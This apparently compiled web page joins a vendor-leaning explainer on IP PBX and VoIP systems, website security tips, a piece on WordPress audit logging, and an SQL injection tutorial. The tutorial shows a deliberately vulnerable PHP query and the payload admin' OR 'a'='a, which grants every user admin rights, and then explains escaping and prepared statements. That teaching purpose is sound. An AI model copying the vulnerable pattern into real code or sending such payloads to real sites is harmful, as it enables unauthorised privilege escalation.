When an IP PBX is installed on-site it uses the existing LAN network, resulting in low latency and less room for interference. It’s also much easier to install than other PBX systems. Network engineers and Administrators can easily configure and manage an IP PBX system as most distributions come with a simple user interface. This means system and phone settings, call routing, call reporting, bandwidth usage and other settings can be seen and configured in a simple browser window. In some cases, employees can even configure their own preferences to suit their workflow.

Once installed, an IP PBX can run on the existing network, as opposed to a whole telephone infrastructure across business premises. That means less cable management and the ability to use existing Ethernet cables, resulting in smaller starting costs. This reduction in starter costs can be even more significant if the company has multiple branches in different places. Internet Leased Lines with unlimited usage plans mean voice calls can be transmitted over WAN IP at no extra cost.

In addition, firms can use Session Initiation Protocol (SIP) trunking to reduce phone bills for most calls. Communications are routed to the Telco using a SIP trunk via the IP PBX directly or a Voice Gateway. SIP is an IP-based protocol which means the Telco can either provide a dedicated leased line directly into the organization’s premises or the customer can connect to a Telco’s SIP server via the internet. Usually main Telco lines are provided via a dedicated IP-based circuit to ensure line stability and low latency.

With SIP trunks Telco providers usually offer heavily reduced prices over traditional methods such as PSTN or ISDN circuits. This is especially true for long-distance calls, where communication can be made for a fraction of a price when compared to older digital circuits.

Savings on calls via SIP trunk providers can be so significant that many companies with old Legacy PBXs have installed an IP PBX that acts as a Voice Gateway, which routes calls to a SIP provider as shown in the diagram below:

Connecting an Analogue-Digital PBX with a SIP Provider via a Voice Gateway 

Connecting an Analogue-Digital PBX with a SIP Provider via a Voice Gateway

In this example an IP PBX with Voice Gateway (VG) capabilities is installed at the organization. The Voice Gateway connects on one end with the Analogue - Digital PBX using an ISDN BRI interface providing up to 2 concurrent calls while at the other end it connects with a SIP provider via IP.

The SIP provider can be reached via the internet, usually using a dedicated internet connection, or even a leased line if the SIP provider has such capabilities. The Analogue - Digital PBX is then programmed to route all local and national calls via the current telco while all international calls are routed to the SIP provider via the Voice Gateway.

The organization is now able to take advantage of the low call costs offered by the SIP provider.

The digital nature of IP PBX makes it more mobile. Softphone applications support IP PBX and let users make calls over the internet from their smartphone or computer. This allows for huge portability while retaining the same extension number. Furthermore, this often comes at a flat rate, avoiding per-minute fees. Advanced Softphones support a number of great features such as call recording, caller ID choice, transfer, hold, voice mail integration, corporate directory, just to name a few.

A great example is 3CX’s Free Windows softphone, which is a great compact application under continuous development that delivers everything a mobile desktop user would need to communicate with the office and customers while on the road or working from home:

3CX windows softphone client & Presence

3CX Windows Softphone and Presence application

IP PBX, being a pure-IP based solution, means that users are able to relocate between offices or desks without requiring changes to the cabled infrastructure. IP phones can be disconnected from their current location and reconnected at their new one. With the help of a DHCP server the IP phone will automatically reconfigure and connect to the IP PBX with the user’s internal extension and settings.

A technology called Fixed Mobile Convergence or Follow-me can even allow employees to make a landline call on their mobile using WiFi, then move to cellular once they get out of range. The cellular calls can be routed through the IP PBX when on-site through their IP phone or local network. When users are off-site the mobility client automatically registers with the organization’s IP PBX via the internet extending the user’s internal extension to the mobile client. Calls are automatically routed to the mobile client without the caller or co-workers being aware.

Another big advantage is the unification of communications. Rather than a separate hardware phone, email, voicemail and more, companies can roll them into one system. In many cases, softphones can be integrated into the existing software such as Outlook, CRM, ERP and more. What’s more, employees can receive voicemails and faxes straight to their email inbox.

That’s not to say VoIP is without flaws. For a start, it relies heavily on the network, so issues can bring the call system down if a backup isn’t implemented or there are big network problems. It’s also less applicable for emergency services because support for such calls is limited. A lot of VoIP providers offer inadequate functionality and the communications are often untraceable. Though an IP PBX is the best solution for most businesses, it depends on the individual circumstances.

Main Components of a Modern Unified Communication IP PBX

A Unified Communication IP PBX system is made from a series of important components. Firstly, you have the computer needed to run the IP PBX software. This is the Call Control server that manages all endpoint devices, Call routing, voice gateways and more.

The IP PBX software is loaded on the server and configured by the Network Administrator. Depending on the vendor the IP PBX can be integrated into a physical device such as a router e.g Cisco CallManager Express or it might be a software application that can be installed on top of the server’s operating system e.g 3CX IP PBX.

In 3CX’s case, the IP PBX software can run under the Windows platform (workstation or server) or even the Linux platform. 3CX also supports Hyper-V and VMWare virtualization platforms helping dramatically increase availability and redundancy at no additional cost.

IP PBX & VoIP Network Components

IP PBX & VoIP Network Components

VoIP Gateways, aka Voice Gateways or Analogue Telephony Adaptor (ATA), play a dual role – they act as an interface between older analogue devices such as phones, faxes etc and the newer VoIP network allowing them to connect to the VoIP network. The VoIP Gateway in this case is configured with the extensions assigned to these devices and registers to the IP PBX on their behalf using the SIP protocol. When an extension assigned to an analogue device is called, the IP PBX will send the signal to the VoIP Gateway which will produce the necessary ringing signal to the analogue device and make it ring. As soon as the phone is picked up, the VoIP Gateway will connect the call acting as a “router” between the analogue device and VoIP network. ATA is usually the term used to describe a VoIP Gateway that connects a couple of analogue devices to the VoIP network.

VoIP Gateways are also used to connect an IP PBX to the Telco, normally via an ISDN (BRI or PRI) or PSTN interface. Incoming and outgoing calls will traverse the VoIP Gateway connecting the IP PBX with the rest of the world.

IP phones are the physical devices used to make and accept phone calls. Depending on the vendor and model, these can be simple phones without a display or high end devices with colour multi-touch displays and enhanced functions such as multiple line support, speed dials, video conferencing and more. Popular vendors in this field include Cisco, GrandStream, Yealink and others. All IP phones communicate using the non-propriatery SIP protocol. This makes it easy for organizations to mix and match different hardware vendors without worrying about compatibility issues.

In the case of a softphone the application runs on a desktop computer or smartphone and is capable of providing all services similar to those of an IP phone plus a lot more. Users can also connect a headset, microphone, or speakers if needed.

3CX Android and iPhone softphone SIP client

3CX’s free SIP-based softphone for Android (left) and iPhone (right) both provide a wealth of functions no matter where users are located

However, the key part of a Unified Communication IP PBX is its ability to use this existing hardware and software to bring multiple mediums together intuitively. Outlook allows you to make softphone calls straight from the email interface, removing the need for a long lists of details.

This is combined with the integration of instant messaging so that call takers can correspond with other staff if they’re giving tech support. It can be further enhanced by desktop sharing features to see exactly what a user is doing, as well as SMS, fax, and voicemail.

More advanced Unified Communications platforms use speech recognition for automatic, searchable transcriptions of calls. Large organizations are even implementing artificial intelligence in their workflow. Microsoft’s virtual support assistant looks at what employees are doing and provides relevant advice, information, and browser pages. The ultimate goal is for an employee to obtain everything they need with minimal effort.

How an IP PBX Works

It’s important to understand how each of these components work to form a cohesive whole. Each IP phone is registered with the IP PBX server, which is usually just a specially configured PC running the Windows or Linux operating system. This OS can also be run on a virtual machine.

Advanced IP PBX systems such as 3CX support both Windows and Linux operating systems but can also be hosted on virtualized platforms such as Hyper-V and VMware, offering great value for money.

The IP PBX server creates a list that contains the Session Initiation Protocol addresses (SIP) of each phone. For the unfamiliar, SIP is the most popular protocol for transmitting telephone data over networks. It sits on top of the application layer of the OSI model, and integrates elements from HTTP and SMTP. As such, the identifying SIP addresses look like a mash-up of an email address and a telephone number.

SIP Accounts

SIP endpoint accounts (IP Phones, softphones, VoIP Gateways) are configured on the IP PBX with their extension and credentials. Similarly the endpoint devices are configured with the IP PBX’s IP address and their previously configured accounts. Once the SIP endpoint device registers to the IP PBX it is ready to start placing and receiving phone calls.

SIP Endpoint Registering to an IP PBX System 

SIP Endpoint Registering to an IP PBX System

Once a user places a call, the system can determine if the call is going to a phone on the same system or externally. Internal calls are detected via the SIP address and routed straight to each other over LAN. External calls are routed to the Telco Provider via the Voice Gateway or a SIP trunk depending on the setup.

Naturally, these calls are made from the hardware and softphones mentioned earlier. Hardware IP phones connect to the network using a standard RJ-45 connector, replacing the older RJ-11 connectors used by the analogue telephones.

Voice Codecs – G.711, G.729, G.722

Audio signals from the IP phones must be converted into a digital format before it can be transmitted. This is done via a codec, which compresses it and then decodes as it's replayed. There are several different types of codecs, and what you use decides both the audio quality and the amount of bandwidth used.

SIP endpoints located on the LAN network almost always use G.711 codec which has a 1:2 compression and a 64Kbps bitrate plus 23.2Kbps for the IP overhead resulting in a bitrate of 87.2Kbps. It delivers high, analogue telephone quality but comes with a significant bandwidth cost which is not a problem for the local network speeds which average 1Gbps.

When a SIP endpoint is on the road away from the office, moving to a less bandwidth-intensive codec at the expense of voice quality is usually desirable. The most commonly used codec for these cases is G.729, which provides an acceptable audio quality for just 31.2Kbps bitrate that breaks down to 8Kbps plus 23.2Kbps for the IP overhead. It’s similar to the call quality of your average cell phone.

G.711 vs G.729 Call - Bandwidth Requirements per call

G.711 vs G.729 Call - Bandwidth Requirements per call

G.722 delivers a better call quality than even PSTN, but is best for high bandwidth scenarios or when great audio quality is essential.

SIP Trunks

Finally, SIP Trunks are also configured with codecs for incoming and outgoing phone calls. This is also why, when connecting to an internet-based SIP provider, special consideration must be taken to ensure there is enough bandwidth to support the number of simultaneous calls desired. For example, if we wanted to connect to a SIP provider and support up to 24 simultaneous calls using G.711 codec for high-quality audio, we would require 87.2Kbps x 24 = 2092.8Kbps of bandwidth or 2.043Mbps during full line capacity.

Voicemail with IP PBXs

Voicemail works differently to that in a traditional phone environment. A voicemail server was typically a standalone unit or an add-in card. In IP PBX systems, voicemail is integrated into the solution and stored in a digital format. This has several advantages, including the ability to access voicemail via a web browser or mobile phone, forward voicemails to an email account, forward a voicemail to multiple recipients via email and many more.

In addition, some IP PBXs can be configured to automatically call the person for which voicemail was left and play any messages in their voicemail.

How an IP PBX Can Help Save Money

Once you understand the fundamental differences between an IP PBX and legacy analogue/digital PBXs, it becomes clearer how an organization can save.

Because IP PBX runs on existing network infrastructure, there’s no need for separate cabling. This negates a significant chunk of the setup costs, as does the simplicity of installation. The initial investment can be up to ten times less than traditional PSTN systems. It means a huge reduction in service costs. The lack of physical separate wires means no chance for damage that can be costly to repair and maintain. Moving between offices is now an easy task as no cable patching is required from the IP PBX to the IP Phone. All that’s required is a data port to connect the IP phone or an access point in case of a wireless client (laptop, mobile device) with a softphone.

Maintenance of the underlying systems is also far easier. Most IP PBX systems run on either Linux or Windows, systems that technicians are usually intimately familiar with. This means technical problems often don’t need to be outsourced. When a patch or upgrade is available from the vendor the administrator can quickly create a snapshot of the IP PBX system via the virtualization environment and proceed with the installation. In the unlikely event the system doesn’t behave as expected he can roll back to the system’s previous state with the click of a button.

Upgrading the IP PBX to further extend its functionality is far more cost and time efficient compared to older PBXs. In most cases, new features are just a matter of purchasing an add-on or plugin and installing it. This scalability extends to the reach of the system itself. Traditional phone systems only have a certain number of ports that phones can be connected to. Once you reach that limit it will cost a significant amount to replace the existing system. With IP PBX, this isn’t an issue. IP phones connect via the network and aren’t limited by the same kind of physical factors.

As already noted, some IP PBX providers support running on a virtual platform. 3CX is one of the most popular and stable solutions that officially support both Hyper-V and VMWare. This functionality means you can create low-cost backups of the system.

The savings are even more prominent when you consider the price of VoIP compared to traditional PBX. SIP trunking can result in huge monthly savings of around 40%, depending on usage. If the business regularly makes calls abroad, there’s room for even more savings as it won’t be subject to hefty international fees.

3cx easy-to-use IP PBX management consoleThe 3CX Management Console is packed with funtionality, settings, call analysis plus monitoring. (clkick to enlarge)

Furthermore, extending the number of maximum simultaneous calls on a SIP trunk is an easy process usually only requiring changes to the SIP account and additional bandwidth available toward the SIP provider. These changes can generally be made in a few days. With traditional ISDN or PSTN lines the organization would need to order the additional lines from the Telco and wait up to a few weeks to have the new lines physically installed. Then there is the additional monthly service fee charged by the Telco regardless of the new lines usage. Most of these costs do not exist with SIP providers and SIP trunks, making them a much cheaper and faster solution. Most US, UK and Australian based Telco providers are now moving from the ISDN protocol to SIP trunking making it only a matter of time until ISDN is no longer offered as a standard.

Companies can make the choice to use codecs such as G.729 instead of G.711 with their SIP provider. This means that they can choose to sacrifice voice quality and reduce their SIP trunking bandwidth requirements by 70%. For example, a SIP trunk using G.711 codec and supporting up to 24 simultaneous calls requires 87.2Kbps x 24 = 2092.8Kbps of bandwidth or 2.043Mbps during full line capacity.

ISDN T1 Bandwidth requirements - G.711 vs G.729

ISDN T1 Bandwidth requirements - G.711 vs G.729

With G.729 the same SIP trunk would require 31.2Kbps x 24 = 748.8Kbps of bandwidth or 0.73Mbps during full line capacity!

In addition to these direct savings, the advanced features offered by IP PBXs and the flexibility they have can result in a huge increase in productivity. The ability to commutate efficiently with colleagues and customers often results in higher satisfaction, increased work output and more profit.

All of this adds up to some huge cost savings, with estimates of up to 80% over an extended period. Not only are IP PBX systems cheaper to set up, they’re cheaper to maintain, upgrade, scale and remove.

Free IP PBXs vs Paid

It’s often tempting to cut costs further by opting for a free IP PBX solution. However, these often lack the support and features of a paid alternative. Most providers put a limit on outgoing calls, how the absence of important VoIP and Unified Communication features are usually the main problem which servely limit the system's functionality. Solutions such as 3CX offer full product funtionality with up to 8 simultaneous calls and no cost making it the ideal VoIP system for startup and small companies.

The security of some free providers has been brought into question. Asterisk has been hacked on several occasions, though security has been hardened significantly now. Though no system is completely secure, paid providers often have dedicated security teams and ensure systems are hard to penetrate by default, rather than requiring extra configuration or expertise that the end customer might not have.

Low-cost editions come with a multitude of other features. Integration of applications is a big one, 3CX’s pro plan offers Outlook, Salesforce, Microsoft Dynamics, Sugar CRM, Google Contact and more.

It’s a must for unified communications features such as video calls, conferencing and integrated fax servers. The number of participants that can join a conference call is also higher with subscription-based versions of 3CX.

These advanced features extend to calls, with inbuilt support for call recording, queuing and parking. 3CX even offers a management suite for call recordings, saving the need to set up additional software. In paid versions, functionality like this is more likely to extend to Android, iOS, and other platforms.

However, perhaps the most important advantage is the amount of support offered by subscription-based services. Higher profits mean they can offer prompt, dedicated support, against the often slow and limited services of free providers. Though a paid service isn’t always essential, the extra productivity and support they bring is usually well worth the price – especially when considering the negative impact a technical IP telephony issue can have on the organization.

Popular Free/Low-Cost IP PBX Solutions

That said, small businesses can probably get away with a free IP PBX solution. There are reputable, open-source solutions out there completely free of charge. The biggest, most popular one is Asterisk. The toolkit has been going for years, and has a growing list of features that begins to close the gap between free and subscription-based versions.

Asterisk supports call distribution, and interactive voice menu, voicemail, automatic call distribution, and conference calling. It’s still a way off premium services due to many of the reasons above, but it’s about as good as it gets without shelling out.

Despite that, there are still some notable competitors. Many of them started as branches of Asterisk, which tends to happen in the open source community. Elastix is one of these and provides a unified communications server software with email, IM, IP PBX, collaborating and faxing. The interface is a bit simpler than its grandfather, and it pulls in other open source developments such as Openfire, HylaFax and Postfix to offer a more well-rounded feature line-up.

SIP Foundry, on the other hand, isn’t based on Asterisk, and is considered as much as a competitor as there can be. Its feature list is much the same as Asterisk, but is marketed more towards businesses looking to build their own bespoke system. That’s where SIP Foundry’s business model comes in, selling support to companies for a substantial $495 US per month for 100 users.

Other open source software has a focus on security. Kamailio has been around for over fifteen years, and supports asynchronous TCP, UDP and TLS to secure VoIP video text, and WebRTC. This combines with authentication and authorization as well as load balancing and routing fail-over to deliver a very secure experience. The caveat is that Kamailio can be more difficult to configure, and admins need considerable knowledge of SIP.

Then there’s 3CX. The company provides a well-featured free experience that has more than enough to get someone started with IP PBX. All the essential features are there, from call logging, to voicemail, to one-click conferencing. However, 3CX also offers more for those who want it, including some very powerful tools. The paid versions of 3CX are still affordable, but offer the same features of some of the most expensive solutions on the market. It offers almost unprecedented application integration and smart call centre abilities at a reasonable price.

3CX also supports a huge range of IP phones, VoIP Gateways, and any SIP Trunk provider. The company works with a huge list of providers across the world to create pre-configured SIP Trunk templates for a plug and play setup. These templates are updated and tested with every single release, ensuring the user has a problem-free experience. What’s more, powerful, intuitive softphone technology is built straight into the switchboard, including drag and drop calls, incoming call management, and more.

Unified Communications features include mobility clients with advanced messaging and presence features that allow you to see if another user is available, on-call or busy. Click-to-call features can be embedded on the organization’s website allowing visitors to call the company with a click of a button through their web browser. Advanced Unified Communications features such as 3CX WebMeeting enables video calling directly from your organization’s website. Website visitors initiate a video call to your sales team with a click of a button.

 3cx web conferencing

3CX WebMeeting enables clientless video conferencing/presentation from any web browser

Employees can also use 3CX WebMeeting to communicate with colleagues in different physical locations and perform presentations, share videos, PowerPoint presentations, Word document, Excel spreadsheet, desktop or any other application. Many of these features are not even offered in larger high-end enterprise solutions or would cost thousands of dollars to purchase and maintain.

3CX has also introduced VoIP services and functionality suitable for hotels making their system an ideal Hotel-Based VoIP system.

Downloading the free 3CX IP PBX system is well-worth the time and effort for organizations that are seeking to replace or upgrade their PBX system at minimal or no-cost.

Summary

IP PBXs offer so many advantages over traditional PBX that implementation is close to a no-brainer. IP PBX is cheaper in almost every way, while still giving advanced features that just aren’t possible with other systems. The ability to intelligently manage incoming and outgoing calls, create conference calls on the fly, advanced mobility features that make it possible to work from home are almost essential in this day and age. Add to that the greatly reduced time and resources needed to upgrade, and you have a versatile, expandable system which won’t fall behind the competition.

Though some of these benefits can be had with completely free IP PBX solutions, paid services often come with tools that can speed up workflow and management considerably. The returns gained from integration of Microsoft Dynamics, Office 365, Salesforce and Sugar CRM are often well worth the extra cost.

However, such functionality doesn’t have to be expensive. Low-cost solutions like 3CX offer incredible value for money and plans that can be consistently upgraded to meet growing needs. The company lets you scale from a completely free version to a paid one, making it one of the best matches out there for any business size.

  • Hits: 30246

7 Security Tips to Protect Your Websites & Web Server From Hackers

digital eyeRecent and continuous website security breaches on large organizations, federal government agencies, banks and thousands of companies world-wide, has once again verified the importance of website and web application security to prevent hackers from gaining access to sensitive data while keeping corporate websites as safe as possible. Though many encounter a lot of problems when it comes to web application security; it is a pretty heavy filed to dig into.

Some security professionals would not be able to provide all the necessary steps and precautions to deter malicious users from abusing your web application. Many web developers will encounter some form of difficulty while attempting to secure their website, which is understandable since web application security is a multi-faceted concept, where an attacker could make use of thousands of different exploits that could be present on your website.

Although no single list of web security tips and tricks can be considered as complete (in fact, one of the tips is that the amount of knowledge, information and precautions that you can implement is never enough), the following is as close as you can get. We have listed six concepts or practices to aid you in securing your website which, as we already mentioned, is anything but straightforward. These points will get you started and nudge you in the right direction, where some factors in web application security are considered to be higher priority to be secured than others.

1. Hosting Options

web hostingWithout web hosting services most websites would not exist. The most popular methods to host web applications are:regular hosting, where your web application is hosted on a dedicated server that is intended for your website only, and shared hosting, where you share a web server with other users who will in turn run their own web application on the same server.

There are multiple benefits to using shared hosting. Mainly this option is cheaper than having your own dedicated server which, therefore, generally attracts smaller companies preferring to share hosting space. The difference between shared and dedicated hosting will seem irrelevant when looking at this from a functionality point of view, since the website will still run, however, when discussing security we will need to look at it from a completely different perspective.

The downside of shared hosting trumps any advantages that it may offer. Since the web server is being shared between multiple web applications, any attacks will also be shared between them. For example, if you share your web server with an organisation that has been targeted by attackers who have launched Denial of Service attacks on its website, your web application will also be affected since it is being hosted on the same server while using resources from the same resource pool. Meanwhile, the absence of complete control over the web server itself will allow the provider to take certain decisions that may place your web application at risk of being exploited. If one of the websites being hosted on the shared server is vulnerable, there is a chance that all the other websites and the web server itself could be exploited. Read more about web server security.

2. Performing Code Reviews

code review checkMost successful attacks against web applications are due to insecure code and not the underlying platform itself. Case in point, SQL Injection attacks are still the most common type of attack even though the vulnerability itself has been around for over 20 years. This vulnerability does not occur due to incorrect input handling by the database system itself, it is entirely related to the fact that input sanitization is not implemented by the developer, which leads to untrusted input being processed without any filtering.

This approach only applies for injection attacks and, normally, inspecting code would not be this straightforward. If you are making use of a pre-built application, updating to the latest version would ensure that your web application does not contain insecure code, although if you are using custom built apps, an in depth code review by your development team will be required. Whichever application type you are using, securing your code is a critical step or else the very base of the web application will be flawed and therefore vulnerable.

3. Keeping Software Up To Date

software updateWhen using software that has been developed by a third party, the best way to ensure that the code is secure would be to apply the latest updates. A simple web application will make use of numerous components that can lead to successful attacks if left unpatched. For example, both PHP and MySQL were vulnerable to exploits at a point in time but were later patched, and a default Linux webserver installation will include multiple services all of which need to be updated regularly to avoid vulnerable builds of software being exploited.

The importance of updating can be seen from the HEARTBLEED exploit discovered in OpenSSL, which is used by most web applications that serve their content via HTTPS. That being said, patching these vulnerabilities is an easy task once the appropriate patch has been released, you will simply need to update your software. This process will be different for every operating system or service although, just as an example to see how easy it is, updating services in Debian based servers will only require you to run a couple of commands.

4. Defending From Unauthorised Intrusions

defending against intrusionsWhile updating software will ensure that no known vulnerabilities are present on your system, there may still be entry points where an attacker can access your system that have been missed in our previous tips. This is where firewalls come into play. A firewall is necessary as it will limit traffic depending on your configuration and can also be found on most operating systems by default.

That being said, a firewall will only be able to analyse network traffic, which is why implementing a Web Application Firewall is a must if you are hosting a web application. WAFs are best suited to identifying malicious requests that are being sent to a web server. If the WAF identifies an SQL Injection payload in a request it will drop that request before it reaches the web server. Meanwhile if a WAF is not able to intercept these requests, you may also set up custom rules depending on the requests that need to be blocked. If you are wondering which requests you can block even before your WAF can, take a look at our next tip.

5. Performing Web Vulnerability Scans

web vulnerability scansNo amount of code reviews and updates can ensure that the end product is not vulnerable and cannot be exploited. Code reviews are limited since the executed code is not being analysed, which is why web vulnerability scanning is essential. Web scanners will view the web application as a black box, where they will be analysing the finished product, which is not possible with white box scanning or code reviews. Meanwhile, some scanners will also provide you with the option to perform grey box scanning, by combining website scans and a backend agent that can analyse code.

As complex and large as web applications are nowadays, it would be easy to miss certain vulnerabilities while performing a manual penetration test. Web vulnerability scanners will automate this process for you, thereby being able to cover a larger website in less time, while being able to detect most known vulnerabilities. One notorious vulnerability that is difficult to identify is DOM-based XSS, although web scanners are still able to identify such vulnerabilities. Web vulnerability scanners will also provide you with requests that you need to block on your Web Application Firewall (WAF), while you are working to fix these vulnerabilities.

6. Importance Of Monitoring

application monitoring alertsIt is imperative to know if your web application has been subjected to an attack. Monitoring the web application, and the server hosting it, would be the best way to ensure that even if an attacker gets past your defence systems, at least you will know how, when and from where it happened. There may be cases when a website is brought offline due to an attack and the owner would not even know about the incident but will find out after precious time has passed.

To avoid this you can monitor server logs, for example enabling notifications to be triggered when a file is deleted or modified. This way, if you had not modified that particular file, you will know that someone else has unauthorised access to your server. You can also monitor uptime which comes in handy when the attack is not as stealthy as modifying files, such as when your web server is subject to a Denial of Service attack. Such utilities will notify you as soon as your website is down, without having to discover the incident from users of your website.

The worst thing you can do when implementing monitoring services would be to base them on the same web server that is to be monitored. If this server was knocked down, the monitoring service will not be available to notify you.

7. Never Stop Learning

Finally, whatever you currently know about web security it’s never enough. Never stop learning about improving your web application’s security because literally every day brings a new exploit that may be used against your website. Zero day attacks happen out of the blue, which is why keeping yourself updated with any new security measures that you can implement is imperative. You can find such information from multiple web security blogs that detail how a website administrator should enforce their website’s security.

  • Hits: 26346

WordPress Audit Trail: Monitor Changes & Security Alerts For WordPress Blogs, Websites, e-Shops - Regulatory Compliance

wordpress-audit-trail-log-site-security-alerts-1aMonitoring, Auditing and obtaining Security Alerts for websites and blogs based on popular CMS systems such as WordPress, has become a necessity. Bugs, security exploits and security holes are being continuously discovered for every WordPress version making monitoring and auditing a high security priority. In addition, multi-user environments are often used for large WordPress websites, making it equally important to monitor WordPress user activity.

Users with different privileges can login to the website’s admin pages and publish content, install a plugin to add new functionality to the website, or change a WordPress theme to change the look and feel of the website. From the admin pages of WordPress users can do anything, including taking down the website for maintenance, depending on their privileges.

The Need to Keep a Log of What is Happening on Your WordPress

Every type of multi-user software keeps an audit trail that records all user activity on the system. And, since modern business websites have become fully blown multi-user web applications, keeping a WordPress audit trail is a critical and must do task. A default installation of WordPress does not have an audit trail, but the good news is that there are plugins such as WP Security Audit Log that allow you to keep an audit trial of everything that is happening on your WordPress.

wordpress-audit-trail-log-site-security-alerts-1Figure 1. Plugins like WP Security Audit Log provide detail tracking of all necessary events (click to enlarge)

There are several advantages to keeping track of all the changes that take place on your WordPress website in an audit trail. Here are just a few:

Keep Track Of Content & Functionality Changes On Your WordPress

By keeping a WordPress audit trail you can find out who did what on your WordPress website. For example; who published an article, or modified existing and already published content of an article or a page, installed a plugin, changed the theme or modified the source code of a file.

 Searching for specific events in WordPress Security Audit Log

Figure 2. Searching for specific events in WordPress Security Audit Log (click to enlarge)

Be Alerted to Suspicious Activity on Your WordPress

By keeping a WordPress Audit trail you can also be alerted to suspicious activity on your WordPress at an early stage, thus thwarting possible hack attacks. For example, when a WordPress is hacked, typically the attackers reset a user’s password or create a new account to login to WordPress. By using an add-on such as Email Notifications you can create specific rules so when important changes happen on your WordPress they are logged and you are notified via email.

wordpress-audit-trail-log-site-security-alerts-3 Figure 3. WP Security Audit Log: Creating customized email alerts for your WordPress site

Ensure the Productivity of Your Users & Employees

Nowadays many businesses employ remote workers. As much as businesses benefit by employing remote workers, there are disadvantages. For example, while the activity of employees who work from the office can be easily tracked, that of remote workers cannot. Therefore if your business website is powered by WordPress, when you install a WordPress audit trail plugin you can keep track of everything your web team is doing on the website, including the login and logout times, and location.

Ensure Your Business WordPress Websites Meet Mandatory Regulatory Compliance Requirements

If you have an online business, or if you are any sort of business via your WordPress website, there is a number of regulatory compliance requirements your website needs to adhere to, such as the PCI DSS. One common requirement these regulatory compliance requirements have is logs. As a website owner you should keep a log, or audit trail, of all the activity that is happening on your website.

Ease WordPress Troubleshooting

If you already have experience managing a multi-user system, you know that if something breaks down users will never tell you what they did. This is common, especially when administering customers’ websites. The customer has administrative access to WordPress. Someone installs a plugin, the website goes haywire yet it is no one’s fault. By keeping a WordPress audit trail you can refer to it and easily track any website changes that took place, thus making troubleshooting really easy.

Keep A WordPress Audit Trail

There are several other advantages when you keep a WordPress audit trail to keep a record of all the changes that take place on your WordPress site, such as having the ability to generate reports to justify your charges. The list of advantages can be endless but the most important one is security. Typically overlooked, logging also helps you ensure the long term security of your WordPress website.

 

  • Hits: 18974

Understanding SQL Injection Attacks & How They Work. Identify SQL Injection Code & PHP Caveats

Introduction-to-SQL-Injection-01SQL Injections have been keeping security experts busy for over a decade now as they continue to be one of the most common type of attacks against webservers, websites and web application servers. In this article, we explain what a SQL injection is, show you SQL injection examples and analyse how these type of attacks manage to exploit web applications and webservers, providing hackers access to sensitive data.

Additional interesting Web Hacking and Web Security content:

What Is A SQL Injection?

Websites operate typically with two sides to them: the frontend and backendThe frontend is the element we see, the rendered HTML, images, and so forth.  On the backend however, there are layers upon layers of systems rendering the elements for the frontend. One such layer, the database, most commonly uses a database language called SQL, or Structured Query Language. This standardized language provides a logical, human-readable sentence to perform definition, manipulation, or control instructions on relational data in tabular form. The problem, however, is while this provides a structure for human readability, it also opens up a major problem for security.

Typically, when data is provided from the frontend to the backend of a website – e.g. an HTML form with username and password fields – this data is inserted into the sentence of a SQL query. This is because rather than assign that data to some object or via a set() function, the data has to be concatenated into the middle of a string. As if you were printing out a concatenated string of debug text and a variable’s value, SQL queries work in much the same way. The problem, however, is because the database server, such as MySQL or PostgreSQL, must be able to lexically analyse and understand the sentence’s grammar and parse variable=value definitions. There must exist certain specific requirements, such as wrapping string values in quotes. A SQL injection vulnerability, therefore, is where unsanitized frontend data, such as quotation marks, can disrupt the intended sentence of a SQL query.

How Does A SQL Injection Work?

So what does “disrupt the intended sentence of a SQL query” mean? A SQL query reads like an English sentence:

Take variable foo and set it to ‘bar’ in table foobar.
Notice the single-quotes around the intended value, bar. But if we take that value, add a single quote and some additional text, we can disrupt the intended sentence, creating two sentences that change the entire effect. So long as the database server can lexically understand the sentence, it is none the wiser and will happily complete its task.  So what would this look like?

If we take that value bar and change it to something more complex – bar’ in table foobar. Delete all values not equal to ‘ – it completely disrupts everything. The sentence is thus changed as follows:

Take variable foo and set it to ‘bar’ in table foobar. Delete all values not equal to ‘’ in table foobar.

Notice how dramatically this disrupts the intended sentence? By injecting additional information, including syntax, into the sentence, the entire intended function and result has been disrupted to effectively delete everything in the table, rather than just change a value.

What Does A SQL Injection Look Like?

In code form, a SQL injection can find itself in effectively any place a SQL query can be altered by the user of a web application. This means things like query strings e.g: example.com/?this=query_string, form content (such as a comments section on a blog or even a username & password input fields on a login page), cookie values, HTTP headers (e.g. X-FORWARDED-FOR), or practically anything else.  For this example, consider a simple query string in PHP:

Request URI: /?username=admin
 
1.  $user = $_GET['username'];
2.  mysql_query("UPDATE tbl_users SET admin=1 WHERE username='$user'");

First, we will break this down a bit.

On line #1, we set the value of the username field in the query string to the variable $user.

On line #2, we insert that variable’s value into the query string’s sentence. Substituting the variable for the value admin in the URI, the database query would ultimately be parsed as follows by MySQL:

UPDATE tbl_users SET admin=1 WHERE username='admin'

However, a lack of basic sanitization opens this query string up to serious consequences. All an attacker must do is put a single quote character in the username query string field in order to alter this sentence and inject whatever additional data he or she would like.

Here is an example of what this would look like:

Request URI: /?username=admin' OR 'a'='a
 
1.  $user = $_GET['username'];
2.  mysql_query("UPDATE tbl_users SET admin=1 WHERE username='$user'");

Now, with this altered data, here is what MySQL would see and attempt to evaluate:

UPDATE tbl_users SET admin=1 WHERE username='admin' OR 'a'='a'

Notice, now, that if the letter A equals the letter A (basically true=true), all users will be set to admin status.

Ensuring Code is Not Vulnerable to SQL Injection Vulnerabilities

If we were to add a function, mysql_real_escape_string() for example, on line #1, that would prevent this particular variable from being vulnerable to a SQL injection. In practice, it would look like this:

Request URI: /?username=admin' OR 'a'='a                                                                                                                                                            1.  $user = mysql_real_escape_string($_GET['username']);
2.  mysql_query("UPDATE tbl_users SET admin=1 WHERE username='$user'");

This function escapes certain characters dangerous to MySQL queries, by prefixing those characters with backslashes. Rather than evaluate the single quote character literally, MySQL understands this prefixing backslash to mean do not evaluate the single quote. Instead, MySQL treats it as part of the whole value and keeps going.  The string, to MySQL, would therefore look like this:


UPDATE tbl_users SET admin=1 WHERE username='admin\' OR \'a\'=\'a'

Because each single quote is escaped, MySQL considers it part of the whole username value, rather than evaluating it as multiple components of the SQL syntax. The SQL injection is thus avoided, and the intention of the SQL sentence is thus undisrupted.

Caveat: For these examples, we used older, deprecated functions like mysql_query() and mysql_real_escape_string() for two reasons:

1.    Most PHP code still actively running on websites uses these deprecated functions;
2.    It allows us to provide simple examples easier for users to understand.

However, the right way to do it is to use prepared SQL statements. For example, the prepare() functions of the MySQLi and PDO_MySQL PHP extensions allow you to format and assemble a SQL statement using directive symbols very much like a sprintf() function does. This prevents any possibility of user input injecting additional SQL syntax into a database query, as all input provided during the execution phase of a prepared statement is sanitized.  Of course, this all assumes you are using PHP, but the idea still applies to any other web language.

